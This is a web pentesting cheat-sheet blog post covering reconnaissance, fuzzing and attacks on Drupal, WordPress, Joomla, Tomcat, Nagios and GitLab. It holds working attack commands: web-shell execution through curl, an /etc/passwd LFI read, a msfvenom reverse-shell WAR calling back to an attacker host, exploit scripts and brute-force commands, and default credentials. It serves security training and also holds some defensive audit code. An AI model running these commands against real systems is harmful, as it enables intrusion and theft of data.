
Pentesting - Pentesting Web

Incorrect DNS Resolution

Add the domain and its IP to the /etc/hosts file:

```shell
sudo nano /etc/hosts
```

CMS Scanner

Tool - cmsmap

Command syntax:

```shell
python cmsmap.py https://<IP>
```

URL to download it: github-cmsmap

Tool - cmseek

```shell
python3 cmseek.py -u <domain.com>
```

More info in: CMSeeK

Sniffers

Wireshark

Tcpdump

https://github.com/DanMcInerney/net-creds

https://github.com/lgandx/PCredz

Test SSL Certificate

Tool - Testssl

Syntax:

```shell
./testssl.sh <domain.com>
```

URL to download it: Github

Vulnerability Web Scanner

Tool - Nikto

Syntax:

```shell
nikto -h http://<IP>
```

Tool - Nuclei

Syntax:

```shell
nuclei -u https://<IP>
```

More information and download: https://github.com/projectdiscovery/nuclei

Other automatic Tools

  • recon-ng

  • Nessus

  • OpenVAS

Tools for Testing Web Applications

Burpsuite: intruder, repeater, intercept

Owasp ZAP: Hub to view hidden fields, crawling, etc.

Tools to Discover Web Technology

Whatweb

```shell
whatweb http://<IP>
```

Wappalyzer

Curl and wget Commands

Curl and Wget are both command-line tools for downloading files from the internet. They are valuable utilities for fetching files and data from web servers efficiently.

Curl

Example:

```shell
curl http://<IP>/<file.txt>
```

Wget

Example:

```shell
wget http://<IP>/<file.txt>
```

Example to do it recursively:

```shell
wget -r http://<IP>
```

Tool for Detecting WAF (Web Application Firewall)

wafw00f

Command example:

```shell
wafw00f https://<domain.org>
```

URL to github: wafw00f

Add a Proxy to route all Traffic

Burpsuite and OwaspZAP are very good tools for it.

Proxychains is a very useful Linux tool that routes the traffic of any command-line tool through a proxy we specify.

Because it wraps any command-line tool, it is the simplest and easiest way to send the web traffic of command-line tools through our web proxies.

To use proxychains, we first have to edit /etc/proxychains.conf, comment out the final line and add a new line at the end of it.

Example of new line:

```shell
http 127.0.0.1 8080
```

Example to run a curl command with proxychains:

```shell
proxychains curl http://SERVER_IP:PORT
```

If we go to our web proxy (Burpsuite for example), we will see that the request has indeed gone through it.

In Metasploit, the same can be done with the RPROXIES option.

Example:

```shell
set RPROXIES HTTP:127.0.0.1:8080
```

Enumerate DNS Information about a Domain

Tool - dnsenum

Command syntax:

```shell
dnsenum -o <output.xml> <example.com>
```

Tool - whois

Command syntax:

```shell
whois <IP or domain>
```

Tool - Nslookup

Command syntax:

```shell
nslookup [options] [domainName]
```

Web Content Scanner and Fuzzing

dirb is an interesting tool to find subdirectories:

```shell
dirb http://<target> <pathWordlist>
```

Fuzzing for Subdomains and Subdirectories

ffuf is an interesting tool to find subdirectories and subdomains.

Find subdirectories:

```shell
ffuf -w <pathWordlist>:FUZZ -u https://target/FUZZ
```

GET - Parameter fuzzing:

```shell
ffuf -w </path/to/values.txt>:FUZZ -u 'https://target/script.php?valid_name=FUZZ' -fc 401
```

POST - Parameter fuzzing:

```shell
ffuf -w /path/to/postdata.txt:FUZZ -X POST -d 'username=admin&password=FUZZ' -u https://target/login.php -fc 401
```

Find subdomains:

```shell
ffuf -w <subdomains.txt>:FUZZ -u http://website.com/ -H 'Host: FUZZ.website.com'
```

Example:

```shell
ffuf -w namelist.txt:FUZZ -u http://10.129.203.101/ -H 'Host:FUZZ.inlanefreight.local' -fs 15157
```

Useful dictionary: /SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Find extensions:

```shell
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://SERVER_IP:PORT/blog/indexFUZZ
```

To find files with the extension php:

```shell
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php
```

To find parameters:

```shell
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value'
```

Filter by size or by code to see the different ones:

```shell
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
```

To find LFI with that parameter found:

```shell
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://165.22.118.93:30678/index.php?view=FUZZ' -fs 1935
```

Tip: In PHP, POST data with the "content-type" header can only be accepted as "application/x-www-form-urlencoded". So we set that header in ffuf with -H 'Content-Type: application/x-www-form-urlencoded'.

Example:

```shell
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'
```

Filter options: -fc filters out responses by status code, -fs filters out responses by size.
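The -fc and -fs options work by discarding the response the application returns for every payload it does not handle, so that only the payloads that change the response remain. As an added example (not from the original post), this Python models that filtering plus an automatic baseline on a constructed result set rather than a live target:

```python
from collections import Counter

# Constructed sample results as (payload, HTTP status, response size in bytes).
# A parameter fuzz usually returns the same "unknown parameter" page for almost
# every payload; only the payloads the application actually handles differ.
SAMPLE_RESULTS = [
    ("id", 200, 2287),
    ("user", 200, 2287),
    ("page", 200, 2287),
    ("view", 200, 1935),   # different size: the parameter changes the page
    ("debug", 500, 812),   # different status: the parameter is parsed
    ("token", 401, 2287),
    ("admin", 403, 612),
]

def filter_results(results, fc=(), fs=()):
    """Drop results whose status is in fc or whose size is in fs (ffuf -fc / -fs)."""
    return [r for r in results if r[1] not in fc and r[2] not in fs]

def auto_calibrate(results):
    """Take the most common (status, size) pair as the 'not found' baseline and
    keep only the results that differ from it (roughly what ffuf -ac does)."""
    baseline, _ = Counter((r[1], r[2]) for r in results).most_common(1)[0]
    return baseline, [r for r in results if (r[1], r[2]) != baseline]

if __name__ == "__main__":
    # Manual filter: the baseline size is read off a first run, as with -fs 2287.
    print(filter_results(SAMPLE_RESULTS, fs=(2287,)))
    # Automatic baseline: no need to know the size in advance.
    print(auto_calibrate(SAMPLE_RESULTS))
```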

More Tools - Find Subdomains

Sublist3r

https://github.com/aboul3la/Sublist3r

crt.sh - Online tool

https://crt.sh/

dnsenum

```shell
dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
```

Zone Transfer

Zone transfer in pentesting is the process of obtaining DNS zone data from a target to gather valuable information about its domain names, subdomains, and network structure, helping to identify potential vulnerabilities and entry points.

  1. Identify the nameservers:

```shell
nslookup -type=NS zonetransfer.me
```

  2. Perform the zone transfer using the -type=any and -query=AXFR parameters (testing for ANY and AXFR zone transfer):

```shell
nslookup -type=any -query=AXFR zonetransfer.me nsztm1.digi.ninja
```

Example Subdomain Brute Forcing

```shell
for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
```

Try zone transfer

Example:

```shell
dig axfr @<IP> <domain.com>
```

Pentest Common CMS

Drupal

Discovery

A Drupal website can be identified in several ways, including by the header or footer message Powered by Drupal, the standard Drupal logo, the presence of a CHANGELOG.txt file or README.txt file, via the page source, or clues in the robots.txt file such as references to /node.

```shell
curl -s http://drupal.domain.local | grep Drupal
```

Another way to identify Drupal CMS is through nodes. Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.

Enumeration

```shell
curl -s http://domain.local/CHANGELOG.txt | grep -m2 ""
```

Tool - droopescan

Droopescan is an open-source tool designed to perform vulnerability scans on Drupal-based content management systems (CMS). It aims to identify potential weaknesses and vulnerabilities in websites that use the Drupal CMS.

Command:

```shell
droopescan scan drupal -u http://example.org/ -t 32
```

More info: https://github.com/droope/droopescan

Tool - drupwn

Drupwn is a tool used for gathering information and performing security assessments on Drupal websites. It helps identify potential vulnerabilities and weaknesses in websites that use the Drupal content management system.

Command:

```shell
python3 drupwn --mode enum --target https://example.com
python3 drupwn --mode exploit --target https://example.com
```

More info: drupwn

Vulnerability - Drupalgeddon

Exploit Drupalgeddon: https://www.exploit-db.com/exploits/34992

```shell
python2.7 drupalgeddon.py -t http://domain.local -u <user> -p <password>
```

We could also use the exploit/multi/http/drupal_drupageddon Metasploit module to exploit this.

Exploit Drupalgeddon2: https://www.exploit-db.com/exploits/44448

Exploit Drupalgeddon3: https://github.com/rithchard/Drupalgeddon3

In Metasploit: multi/http/drupal_drupageddon3

Wordpress

Tool - wpscan

Install it:

```shell
sudo gem install wpscan
```

Command syntax:

```shell
wpscan --url http://<IP>/ --enumerate
```

Looking for users, command example:

```shell
wpscan -e u -t 500 --url http://<domain>
```

Plugins:

```shell
wpscan --url http(s)://<domain> --enumerate p
```

Vulnerable plugins:

```shell
wpscan --url http(s)://<domain> --enumerate vp
```

Brute force:

```shell
wpscan --url http://<domain> -P <passwords.txt> -U <users.txt>
```

Brute force to xmlrpc login:

The wp-login method will attempt to brute force the standard WordPress login page, while the xmlrpc method uses WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it’s faster.

```shell
sudo wpscan --password-attack xmlrpc -t 20 -U <user> -P <pathWordlist> --url http://<domain>
```

Interesting paths:

  • /wp-admin: login page
  • /wp-content/uploads: files stored on the server

Manual - Discovery themes

```shell
curl -s http://<domain>/ | grep themes
```

Manual - Discovery plugins

```shell
curl -s http://<domain>/ | grep plugins
```

Other way:

```shell
nmap -sV --script http-wordpress-enum <IP>
```

Code Execution

With administrative access to WordPress, we can modify the PHP source code to execute system commands. Click on Appearance on the side panel and select Theme Editor. This page will let us edit the PHP source code directly. An inactive theme can be selected to avoid corrupting the primary theme.

Click on Select after selecting the theme, and find a page to edit it.

For example, we can edit a page such as 404.php to add a web shell.

Click on Update File at the bottom to save. We know that WordPress themes are located at /wp-content/themes/<theme name>. We can interact with the web shell via the browser or using cURL. As always, we can then utilize this access to gain an interactive reverse shell and begin exploring the target.

Example of RCE:

```shell
curl http://<domain>/wp-content/themes/twentynineteen/404.php?0=id
```

Metasploit has a module that uploads a malicious plugin and then uses it to execute a PHP Meterpreter shell.

```shell
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
```
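The Theme Editor path above means that a single edited theme file such as 404.php is enough, so a defender watches theme files for any change. As an added example (not the post's own code), this Python compares a theme directory against a known-good hash manifest; the file paths and contents are constructed for illustration.

```python
import hashlib

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Constructed clean theme snapshot (path -> contents) and the manifest a defender
# stores from it. A real deployment would walk wp-content/themes on disk instead.
CLEAN_THEME = {
    "twentynineteen/404.php": b"<?php get_header(); ?><h1>Not found</h1><?php get_footer(); ?>",
    "twentynineteen/functions.php": b"<?php add_theme_support('title-tag');",
    "twentynineteen/style.css": b"/* Theme Name: Twenty Nineteen */",
}
MANIFEST = {path: sha256(data) for path, data in CLEAN_THEME.items()}

# Constructed current state: 404.php was edited through the Theme Editor and
# one file that is not part of the theme appeared.
CURRENT_THEME = dict(CLEAN_THEME)
CURRENT_THEME["twentynineteen/404.php"] = CLEAN_THEME["twentynineteen/404.php"] + b"<?php /* injected */ ?>"
CURRENT_THEME["twentynineteen/inc/cache.php"] = b"<?php /* not in manifest */ ?>"

def audit_theme(manifest: dict, current: dict) -> dict:
    """Return modified, added and missing theme files relative to the manifest."""
    modified = sorted(p for p in manifest if p in current and sha256(current[p]) != manifest[p])
    added = sorted(p for p in current if p not in manifest)
    missing = sorted(p for p in manifest if p not in current)
    return {"modified": modified, "added": added, "missing": missing}

if __name__ == "__main__":
    for kind, paths in audit_theme(MANIFEST, CURRENT_THEME).items():
        for path in paths:
            print(f"{kind}: wp-content/themes/{path}")
```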

Vulnerable plugin - mail-masta

The source code has a parameter that allows including a file without any validation or input sanitization. By using this, we can include arbitrary files on the web server. Let's take advantage of this to retrieve the content of the file /etc/passwd using cURL.

```shell
curl -s http://domain.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
```

Vulnerable plugin - wpDiscuz

The exploit script takes two parameters: -u the URL and -p the path to a valid post.

Example:

```shell
python3 wp_discuz.py -u http://domain.local -p /?p=1
```

We can use cURL to execute commands using the uploaded web shell. We just need to append ?cmd= after the .php extension to run commands which we can see in the exploit script.

```shell
curl -s http://domain.local/wp-content/uploads/2021/08/shell.php?cmd=id
```

Joomla

Fingerprinting

```shell
curl -s http://domain.local/ | grep Joomla
```

We can fingerprint the Joomla version if the README.txt file is present:

```shell
curl -s http://domain.local/README.txt | head -n 5
```

In certain Joomla installs, we may be able to fingerprint the version from JavaScript files in the media/system/js/ directory or by browsing to administrator/manifests/files/joomla.xml.

```shell
curl -s http://domain.local/administrator/manifests/files/joomla.xml | xmllint --format -
```

The cache.xml file can help to give us the approximate version. It is located at plugins/system/cache/cache.xml.

Tool - droopescan

Github: https://github.com/SamJoan/droopescan

Install it:

```shell
sudo pip3 install droopescan
```

Command example:

```shell
droopescan scan joomla --url http://domain.local/
```

Tool - JoomlaScan

Github: https://github.com/drego85/JoomlaScan

Install it:

```shell
sudo python2.7 -m pip install urllib3
sudo python2.7 -m pip install certifi
sudo python2.7 -m pip install bs4
```

Command example:

```shell
python2.7 joomlascan.py -u http://domain.local
```

Tool - Joomla-bruteforce

This tool brute-forces the Joomla login.

Github: https://github.com/ajnik/joomla-bruteforce

Example:

```shell
sudo python3 joomla-brute.py -u http://domain.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr <user>
```

Vulnerability CVE-2019-10945

Github: https://github.com/dpgg101/CVE-2019-10945

Exploit: https://www.exploit-db.com/exploits/46710

Example:

```shell
python2.7 joomla_dir_trav.py --url "http://domain.local/administrator/" --username admin --password admin --dir /
```

Tomcat

Interesting paths:

  • /etc/tomcat9/tomcat-users.xml
  • /manage
  • /manager
  • /host-manager
  • /docs

Default credentials

  • tomcat:tomcat
  • admin:admin

Footprinting/discovery

Syntax:

```shell
curl -s http://<domain>:<port>/docs/ | grep Tomcat
```

Upload a Reverse shell

  1. Create a reverse shell WAR file with msfvenom. Example:

```shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f war -o <file.war>
```

  2. Upload the WAR file.
  3. When the uploaded file is executed, the connection is opened.

Another option is to do it with Metasploit (the shell should be uploaded via the /manage path).

Tomcat Manager - Login Brute Force

Metasploit module -> scanner/http/tomcat_mgr_login

Other way - exploit:

Exploit: https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce

Example:

```shell
python3 mgr_brute.py -U http://<domain>:<port>/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
```

CVE-2020-1938: Ghostcat

Command:

```shell
nmap -sV -p 8009,8080 <domain>
```

PoC: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

Code:

```shell
python2.7 tomcat-ajp.lfi.py <domain> -p <port> -f WEB-INF/web.xml
```

In some Tomcat installs, we may be able to access sensitive data within the WEB-INF directory (for example web.xml).
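Both the default credentials listed in the Tomcat section and the AJP connector that Ghostcat relies on are visible in Tomcat's own configuration files. As an added example (not from the original post), this Python audits constructed tomcat-users.xml and server.xml fragments for those two weaknesses; the role list, the sample accounts and the connector attributes are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Default credentials (the two pairs listed above) and the roles that grant
# Manager or Host Manager access.
DEFAULT_CREDS = {("tomcat", "tomcat"), ("admin", "admin")}
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status", "admin-gui"}

# Constructed tomcat-users.xml: two default accounts with manager roles, one sane account.
TOMCAT_USERS_XML = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui"/>
  <user username="deploy" password="Str0ng-Random-Pass" roles="manager-script"/>
  <user username="admin" password="admin" roles="admin-gui, manager-status"/>
</tomcat-users>"""

# Constructed server.xml: the AJP connector on 8009 is neither bound to loopback
# nor protected by a shared secret, which is the Ghostcat precondition.
SERVER_XML = """<Server port="8005">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

def weak_manager_users(xml_text):
    """Usernames that use a known default password and hold a manager/admin role."""
    found = []
    for user in ET.fromstring(xml_text).iter("user"):
        creds = (user.get("username"), user.get("password"))
        roles = {r.strip() for r in (user.get("roles") or "").split(",") if r.strip()}
        if creds in DEFAULT_CREDS and roles & MANAGER_ROLES:
            found.append(creds[0])
    return found

def exposed_ajp_connectors(xml_text):
    """Ports of AJP connectors that other hosts can reach without a shared secret."""
    exposed = []
    for conn in ET.fromstring(xml_text).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").startswith("AJP"):
            continue
        on_loopback = conn.get("address") in ("127.0.0.1", "::1", "localhost")
        secret_ok = conn.get("secretRequired", "true") == "true" and bool(conn.get("secret"))
        if not on_loopback and not secret_ok:
            exposed.append(conn.get("port"))
    return exposed

if __name__ == "__main__":
    print("default manager credentials:", weak_manager_users(TOMCAT_USERS_XML))
    print("exposed AJP connectors:", exposed_ajp_connectors(SERVER_XML))
```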

Symfony

Tool - eos

https://github.com/synacktiv/eos

Installation

```shell
git clone https://github.com/Synacktiv/eos
python3 -m pip install --user ./eos
```

Example of usage:

```shell
eos scan http://domain.com --output results
```

Nagios

Exploit: https://www.exploit-db.com/exploits/49422

Example:

```shell
python3 nagiosxi-rce.py http://domain.local username password 10.10.14.236 5555
```

Pentest Applications

Git

This command downloads a .git repository exposed on a web server; deleted files can then be restored from it.

Syntax:

```shell
./gitdumper.sh http://<IP>/.git/ <pathOutput>
```

To view repository status and deleted files:

```shell
git status
```

To restore a deleted file:

```shell
git checkout <fileToDownload>
```

GitLab

It is a web-based Git-repository hosting tool that provides wiki capabilities, issue tracking, and continuous integration and deployment pipeline functionality. It is open-source and originally written in Ruby, but the current technology stack includes Go, Ruby on Rails, and Vue.js.

Interesting paths:

  • /help
  • /users/sign_in
  • /explore

Username Enumeration

Exploit: https://www.exploit-db.com/exploits/49821

Other exploit: https://github.com/dpgg101/GitLabUserEnum

Command example:

```shell
./gitlab_userenum.sh --url http://<domain>:<port>/ --userlist <users.txt>
```

or:

```shell
python3 gitlab_userenum.py --url http://<domain>:<port>/ --wordlist <pathWordlist>
```

Caution: by default GitLab locks an account after 10 failed attempts, with an automatic unlock after 10 minutes.

Authenticated Remote Code Execution (RCE)

Exploit RCE: https://www.exploit-db.com/exploits/49951

Example of reverse shell:

```shell
python3 gitlab_13_10_2_rce.py -t http://<domain>:<port> -u <user> -p <password> -c '<reverseShellCode>'
```

This post is licensed under CC BY 4.0 by the author.